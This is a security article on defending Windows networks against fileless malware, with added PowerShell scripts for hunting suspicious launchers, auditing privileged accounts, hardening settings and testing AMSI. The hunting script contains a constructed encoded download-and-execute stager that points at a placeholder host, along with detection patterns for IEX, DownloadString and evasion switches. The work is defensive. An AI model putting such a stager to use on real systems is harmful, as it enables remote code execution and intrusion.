April 17, 2019 By David Strom 4 min read

The threat of fileless malware and its potential to harm enterprises is growing.

Fileless malware relies on what the security community calls “living off the land”: rather than dropping its own executable, the malware drives code that already ships with every Windows computer. On a modern Windows installation that is a lot of code: PowerShell, Windows Management Instrumentation (WMI), VBScript and Office VBA, Windows Registry keys that can hold a payload, the .NET Framework, and so on. Because these components are trusted, signed parts of the operating system, malware that only feeds them scripts or command lines never has to write an executable of its own to disk.

These techniques are routinely chained together. One common link in the chain, process hollowing, starts a legitimate process in a suspended state, replaces its memory with attacker code and resumes it, so the payload runs under a trusted process name instead of as a file of its own. One recent attack analyzed by FireEye combined PowerShell, VB scripts and .NET in a single package.

Attacks leveraging PowerShell are particularly on the rise. Last fall, IBM X-Force Incident Response and Intelligence Services (IRIS) demonstrated just how potent PowerShell-based attacks can be: the payload is decoded and executed directly in the PC’s memory, PowerShell Remoting gives the actor remote execution on other hosts, and because powershell.exe is a signed Microsoft binary that most application whitelisting policies allow, the whitelist sees a permitted program rather than the script it is being fed.

Given this growing threat, what can security teams do to help defend their organizations against fileless malware?

Ensure Strong Companywide Security Hygiene

The general thrust of how to combat fileless malware begins with making sure your Windows computers are patched and up to date. Since one of the first tenets of threat actors is to take advantage of unpatched, older systems, delaying patch management introduces a vulnerability into your network. The spread of EternalBlue illustrated this well: Microsoft shipped the fix (MS17-010) in March 2017, a month before the exploit was leaked and two months before WannaCry used it to spread.

The next step is a solid security awareness program. That doesn’t mean an annual exercise or the occasional test phishing email. Instead, run a program that operates continuously and keeps users alert to the dangers of email attachments and of clicking links without thinking. Most fileless campaigns begin their life with a simple phishing email, so it is important to cut off these entry points early.

Third is to understand how the built-in Windows tooling normally behaves so you can spot anomalies, such as an encoded or obfuscated PowerShell command (the -EncodedCommand switch takes a Base64 blob) installed to run as a service. The combination of the two, the obfuscation and the persistence as a service, should be a red flag; legitimate administration scripts rarely need to hide their contents. Analysts also see payloads that are compressed (Gzip or Deflate streams expanded in memory) instead of, or in addition to, being encoded. Another red flag is a PowerShell script sitting in a \TEMP directory; while not technically fileless, such a stager typically pulls the real payload into memory and quickly moves on to more privileged parts of the operating system (OS).
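A hunt for exactly those red flags, as an added example that is not part of the article: the script classifies service and scheduled-task command lines, decodes any -EncodedCommand payload so the analyst can read what it does, and ships with constructed sample entries so it runs offline; the -Live switch reads the local machine instead. The regular expressions and the sample command lines are assumptions for illustration, not indicators taken from any specific campaign.

```powershell
# Added example, not from the article. Flags services and scheduled tasks whose
# command line runs PowerShell with encoded, compressed, download-and-run or
# TEMP-resident payloads. The patterns and sample entries below are assumptions.

function Test-SuspiciousCommandLine {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$CommandLine)
    $reasons = @()
    if ($CommandLine -notmatch '(?i)\b(powershell|pwsh)(\.exe)?\b') { return $reasons }

    # -e, -ec, -enc, -EncodedCommand: any unambiguous prefix works, followed by Base64
    if ($CommandLine -match '(?i)\s-e[a-z]*\s+[A-Za-z0-9+/=]{16,}') { $reasons += 'encoded command' }
    if ($CommandLine -match '(?i)FromBase64String|GzipStream|DeflateStream') { $reasons += 'in-memory decode/decompress' }
    if ($CommandLine -match '(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\bIEX\b|Invoke-Expression') { $reasons += 'download-and-execute' }
    if ($CommandLine -match '(?i)-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-e(xecutionpolicy|p)\s+bypass|-noni\b|-noninteractive') { $reasons += 'evasion switches' }
    if ($CommandLine -match '(?i)\\temp\\[^\s"]*\.ps1|%temp%') { $reasons += 'script in TEMP' }
    return $reasons
}

function ConvertFrom-EncodedCommand {
    # -EncodedCommand is Base64 over UTF-16LE, so a plain Base64 decode yields garbage.
    param([Parameter(Mandatory)][AllowEmptyString()][string]$CommandLine)
    if ($CommandLine -match '(?i)\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return '<not valid Base64>' }
    }
    return $null
}

function Find-SuspiciousLaunchers {
    param([switch]$Live)
    if ($Live) {
        $entries = @(Get-CimInstance Win32_Service |
            ForEach-Object { [pscustomobject]@{ Source = "service:$($_.Name)"; CommandLine = [string]$_.PathName } })
        $entries += Get-ScheduledTask | ForEach-Object {
            $task = $_
            $task.Actions | ForEach-Object {
                [pscustomobject]@{ Source = "task:$($task.TaskName)"; CommandLine = "$($_.Execute) $($_.Arguments)" }
            }
        }
    } else {
        # Constructed sample data so the script runs offline; the encoded payload is built
        # here from a harmless stager string, not pasted from an incident.
        $stager = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
        $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stager))
        $entries = @(
            [pscustomobject]@{ Source = 'service:Spooler';      CommandLine = 'C:\Windows\System32\spoolsv.exe' }
            [pscustomobject]@{ Source = 'service:WinUpdateSvc'; CommandLine = "powershell.exe -NoP -W Hidden -Enc $b64" }
            [pscustomobject]@{ Source = 'task:Cleanup';         CommandLine = 'powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\up.ps1' }
            [pscustomobject]@{ Source = 'task:Backup';          CommandLine = 'powershell.exe -File C:\Scripts\backup.ps1' }
        )
    }
    foreach ($e in $entries) {
        $reasons = @(Test-SuspiciousCommandLine $e.CommandLine)
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Source  = $e.Source
                Reasons = $reasons -join ', '
                Decoded = ConvertFrom-EncodedCommand $e.CommandLine
            }
        }
    }
}

Find-SuspiciousLaunchers | Format-List
# Find-SuspiciousLaunchers -Live | Format-List   # scan this machine's services and tasks
```

On the sample data only the WinUpdateSvc service (encoded command, hidden window, and the decoded download-and-execute stager) and the Cleanup task (execution policy bypass, script in TEMP) are reported; the Backup task runs PowerShell too, but from a fixed script path with no evasion switches, which is the kind of baseline behaviour the hunt should learn to ignore.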

Understand Your Access Rights and Privileges

Organizations should understand what happens when fileless malware first detonates. Just because a user clicked a malicious attachment doesn’t mean the malware will stay on that PC. The typical behavior is to move laterally across your network looking for a richer target, such as a domain controller or web server. To limit this, segment your network carefully and make sure you understand access rights, especially for third-party applications and users.

A common pattern is to escalate privileges while moving around the network, and PowerShell is a convenient tool for the reconnaissance that precedes it. They don’t call it PowerShell for nothing: from an ordinary user session an actor can issue reverse Domain Name System (DNS) queries to map hosts, enumerate the access control lists on any network share and list the members of a particular domain group, all without dropping a tool. One of the more basic controls against any malware is therefore to restrict administrator rights to the minimum number of accounts and systems.

Many fileless attacks count on the profligate granting of rights that aren’t needed, are still attached to users who have since left the company, or are outdated for users who no longer access the targeted applications. Companies should develop methods to detect these situations and shut them down quickly. Organizations should also disable Windows components that aren’t needed. Not everyone needs PowerShell; where it can’t be removed outright (it is part of Windows, and the .NET Framework it runs on is a dependency of too many components to strip), remove the legacy PowerShell 2.0 engine, which lacks the logging and scanning hooks of later versions, and constrain the rest with application control. Even more effective is to eliminate support for ancient protocols such as SMBv1, the protocol EternalBlue exploited to cause all the trouble with WannaCry.
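The stale-rights audit the last two paragraphs call for, as an added example that is not part of the article: the script walks the members of a few privileged groups (nested groups flattened) and reports anyone who is disabled, has never logged on, has been inactive, or carries a non-expiring password, then lists local administrators on the host that are not domain principals. It assumes the RSAT ActiveDirectory module on a domain-joined machine; the group list and the 90-day threshold are assumptions to tune.

```powershell
# Added example, not from the article. Reports privileged accounts that should not
# still be privileged. Assumes the ActiveDirectory module (RSAT) on a domain member;
# the default group list and the inactivity threshold are assumptions.
Import-Module ActiveDirectory

function Get-PrivilegedAccountFindings {
    param(
        [string[]]$Groups = @('Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Administrators'),
        [int]$InactiveDays = 90
    )
    $cutoff = (Get-Date).AddDays(-$InactiveDays)
    foreach ($g in $Groups) {
        # -Recursive flattens nested groups, so a service-account group two levels down still counts.
        $members = Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue |
                   Where-Object objectClass -eq 'user'
        foreach ($m in $members) {
            # LastLogonDate is derived from lastLogonTimestamp, which replicates with up to 14 days of lag,
            # so use it for "months of inactivity", not for "logged on yesterday".
            $u = Get-ADUser -Identity $m.distinguishedName -Properties LastLogonDate, PasswordLastSet, PasswordNeverExpires, Enabled
            $flags = @()
            if (-not $u.Enabled)                  { $flags += 'disabled but still privileged' }
            if (-not $u.LastLogonDate)            { $flags += 'never logged on' }
            elseif ($u.LastLogonDate -lt $cutoff) { $flags += "inactive since $($u.LastLogonDate.ToShortDateString())" }
            if ($u.PasswordNeverExpires)          { $flags += 'password never expires' }
            if ($flags) {
                [pscustomobject]@{ Group = $g; Account = $u.SamAccountName; Findings = ($flags -join '; ') }
            }
        }
    }
}

function Get-LocalAdminFindings {
    # Local users sitting in the local Administrators group are the ones that outlive
    # central deprovisioning; every entry here should have an owner and a reason.
    Get-LocalGroupMember -Group 'Administrators' |
        Where-Object { $_.ObjectClass -eq 'User' -and $_.PrincipalSource -ne 'ActiveDirectory' } |
        Select-Object Name, PrincipalSource
}

Get-PrivilegedAccountFindings | Sort-Object Group, Account | Format-Table -AutoSize
Get-LocalAdminFindings | Format-Table -AutoSize
```

Run it on a schedule and diff the output against the previous run: a privileged account that appears with a finding for the first time, or a new local administrator, is the event to act on, and the report doubles as the evidence that the rights were reviewed.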

Finally, while PowerShell can get around application whitelisting, it is still a good idea to deploy such controls. The more you know about how your users consume applications, the more likely you will be able to catch a piece of malware doing something that no other legitimate app has been observed doing. Another measure is to disable macros, in particular Office macros, which malware writers often abuse as the first stage of a fileless chain. This isn’t a universal solution because many users need macros to do their jobs; in that case, block macros in documents that arrived from the internet and allow only signed macros rather than disabling them outright.
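A baseline check for the hardening measures in the last two paragraphs, as an added example that is not from the article: it tests whether SMBv1 is off, the PowerShell 2.0 engine is removed, script block logging is on, and Office is set to block macros in files downloaded from the internet, and with -Apply it makes the change on the local machine. It needs an elevated prompt; the registry policy paths are the documented ones for the Office 16.0 (2016/365) policy branch, and rolling the settings out through Group Policy rather than per machine is the assumed deployment.

```powershell
# Added example, not from the article. Audits a few living-off-the-land hardening
# settings and, with -Apply, enforces them locally. Run elevated. The values are a
# workstation baseline chosen for illustration; deploy via Group Policy at scale.

$sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'

function Set-PolicyValue {
    # Creates the policy key if absent and writes a DWORD; shared by several fixes below.
    param([string]$Path, [string]$Name, [int]$Value)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    Set-ItemProperty -Path $Path -Name $Name -Value $Value -Type DWord
}

function Get-BaselineChecks {
    $checks = @(
        @{ Name = 'SMBv1 server disabled (the WannaCry/EternalBlue vector)'
           Test = { -not (Get-SmbServerConfiguration).EnableSMB1Protocol }
           Fix  = { Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force } }
        @{ Name = 'PowerShell 2.0 engine removed (no AMSI, no script block logging)'
           Test = { (Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root).State -ne 'Enabled' }
           Fix  = { Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null } }
        @{ Name = 'PowerShell script block logging on (event ID 4104)'
           Test = { (Get-ItemProperty $sbl -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1 }
           Fix  = { Set-PolicyValue $sbl 'EnableScriptBlockLogging' 1 } }
    )
    # One check per Office application: block macros in files that carry the Mark of the Web.
    foreach ($app in 'Word', 'Excel', 'PowerPoint') {
        $path = "HKCU:\SOFTWARE\Policies\Microsoft\Office\16.0\$app\Security"
        $checks += @{ Name = "$app blocks macros in files from the internet"
                      Test = { (Get-ItemProperty $path -ErrorAction SilentlyContinue).BlockContentExecutionFromInternet -eq 1 }.GetNewClosure()
                      Fix  = { Set-PolicyValue $path 'BlockContentExecutionFromInternet' 1 }.GetNewClosure() }
    }
    return $checks
}

function Invoke-Baseline {
    param([switch]$Apply)
    foreach ($c in Get-BaselineChecks) {
        $ok = $false
        # A missing module, feature or key simply reads as "not compliant" rather than aborting the run.
        try { $ok = [bool](& $c.Test) } catch { $ok = $false }
        if (-not $ok -and $Apply) {
            & $c.Fix
            try { $ok = [bool](& $c.Test) } catch { }
        }
        [pscustomobject]@{ Check = $c.Name; Compliant = $ok }
    }
}

Invoke-Baseline | Format-Table -AutoSize
# Invoke-Baseline -Apply   # enforce on this machine (elevated prompt required)
```

Constrained Language Mode, the other PowerShell restriction worth having, is deliberately not in the list: it is only enforced reliably when it comes from an application control policy (Windows Defender Application Control or AppLocker), so it belongs in the whitelisting rollout rather than in a registry baseline.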

As a side note, Windows runs on more than desktop computers, and threat actors sometimes target embedded Windows point-of-sale (POS) machines. The attraction is that these computers handle payment card data directly, so extra protection for this population is crucial.

Combat Fileless Malware Threats With Careful Coordination

Microsoft hasn’t been standing still while fileless attacks run rampant. The company developed an open interface called the Antimalware Scan Interface (AMSI) that antimalware vendors can register with. PowerShell, Windows Script Host (VBScript and JScript), Office VBA and the .NET runtime hand AMSI the content of a script or assembly at the moment it is about to run, after any decoding or deobfuscation, which makes it much easier to detect the “tells” of the fileless world: the scanner sees what will actually execute rather than the Base64 blob on the command line.
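To see what AMSI adds, an added example that is not from the article: the first function lists the providers registered with AMSI on this machine (no providers means scripts are not being scanned), and the second assembles Microsoft’s published AMSI test string at run time from fragments, so the text on disk contains nothing to match, and hands it to Invoke-Expression. With Microsoft Defender or another registered provider active, the call is refused before anything runs; if it goes through, no provider is active or something has tampered with AMSI. The test string is the EICAR-style sample that providers are required to flag, not malicious content.

```powershell
# Added example, not from the article. Shows which antimalware products are registered
# with AMSI and demonstrates that a string assembled in memory is scanned as the text
# that will actually run, not as the fragments a static scanner would see on disk.

function Get-AmsiProviders {
    $providerKey = 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'
    $clsids = Get-ChildItem $providerKey -ErrorAction SilentlyContinue | ForEach-Object { $_.PSChildName }
    foreach ($clsid in $clsids) {
        # The provider's friendly name is the default value of its CLSID registration.
        $name = (Get-ItemProperty "HKLM:\SOFTWARE\Classes\CLSID\$clsid" -ErrorAction SilentlyContinue).'(default)'
        [pscustomobject]@{ CLSID = $clsid; Provider = $name }
    }
}

function Test-AmsiAssembledString {
    # Microsoft's AMSI test sample, split so that no fragment is itself detectable.
    $fragments = 'AMSI Test Sample: ', '7e72c3ce-861b-4339-', '8740-0ac1484c1386'
    $assembled = -join $fragments
    try {
        # The expression is a harmless string literal; AMSI scans the text before it is compiled.
        Invoke-Expression "'$assembled'" | Out-Null
        return [pscustomobject]@{ Blocked = $false; Detail = 'no provider objected: AMSI absent, disabled or bypassed' }
    } catch {
        return [pscustomobject]@{ Blocked = $true; Detail = $_.Exception.Message }
    }
}

Get-AmsiProviders | Format-Table -AutoSize
Test-AmsiAssembledString | Format-List
```

The same test run under the legacy PowerShell 2.0 engine (powershell.exe -Version 2, where it is still installed) goes through unblocked, because that engine never calls AMSI; that is the practical reason for removing it.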

In addition, anyone who wants a better understanding of fileless techniques should check out the open source project AltFS. It is a complete fileless virtual file system, built to demonstrate how these techniques store and retrieve data without touching the disk as ordinary files, and it runs on Windows and macOS.

As you can see, fighting fileless malware attacks will take some serious effort and careful coordination among a variety of tools and techniques. With more unpredictable malware threats on the horizon, organizations should take steps today to strengthen their defenses.
